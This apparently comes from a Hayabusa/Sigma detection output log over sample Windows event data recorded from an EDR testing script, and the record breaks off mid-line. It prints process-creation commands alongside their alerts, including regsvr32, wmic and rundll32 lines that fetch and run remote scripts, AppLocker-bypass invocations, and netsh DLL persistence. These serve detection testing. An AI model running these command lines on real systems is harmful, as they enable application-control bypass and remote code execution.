+09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C 
""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct 
scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe 
xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 
+09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.286 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace show status : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace stop : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace show status : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace show status ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace stop : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: 
C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL 
Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat : Path: C:\Windows\System32\dispdiag.exe : User: MSEDGEWIN10\IEUser : Parent Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in 
CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c 